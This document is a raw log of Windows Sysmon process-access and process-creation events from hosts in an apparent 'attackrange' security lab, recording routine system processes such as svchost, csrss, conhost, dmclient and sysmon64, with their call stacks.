10341000x8000000000000000359931Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:02.945{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359932Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:13.009{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359944Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.971{8e433fbf-36c5-6013-9103-000000001100}71207172C:\Windows\system32\conhost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359943Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.971{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36c5-6013-9103-000000001100}7120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\SYSTEM32\CSRSRV.dll+1430|C:\Windows\SYSTEM32\CSRSRV.dll+5fd9|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359942Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359941Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359940Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359939Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359938Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359937Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a45-6013-1e00-000000001100}16409708C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|c:\windows\system32\UBPM.dll+af5a|c:\windows\system32\UBPM.dll+9f29|c:\windows\system32\UBPM.dll+7b81|c:\windows\system32\UBPM.dll+95d1|c:\windows\system32\UBPM.dll+9324|c:\windows\system32\UBPM.dll+869a|c:\windows\system32\UBPM.dll+61dc|c:\windows\system32\EventAggregation.dll+2fbc|c:\windows\system32\EventAggregation.dll+312d|c:\windows\system32\EventAggregation.dll+2870|c:\windows\system32\EventAggregation.dll+2600|c:\windows\system32\EventAggregation.dll+b118|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359936Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.956{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\System32\dmclient.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft Feedback SIUF Deployment Manager ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdmclient.exeC:\Windows\system32\dmclient.exe utcwnfC:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=F75A111BDD09F49FD954AD0C148A123B,SHA256=D9F4EC9052D0C8B799660E7D74B41BA18366016AC361F7A85FE0FBB03637CB47,IMPHASH=8C17DBD4EE43E74FB5E09C8EC8F5271F{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule 10341000x8000000000000000359935Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359934Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.940{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ec7a|c:\windows\system32\lsm.dll+13166|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359933Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.940{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f537|c:\windows\system32\lsm.dll+13087|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359953Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.549{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359952Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.549{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359951Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.158{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359950Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.158{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359949Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.112{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+21a191|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000359948Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-1100-000000001100}111610484C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359947Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359946Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359945Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f537|c:\windows\system32\lsm.dll+1273a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359954Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:23.065{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032669Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032668Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032667Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032666Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032665Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 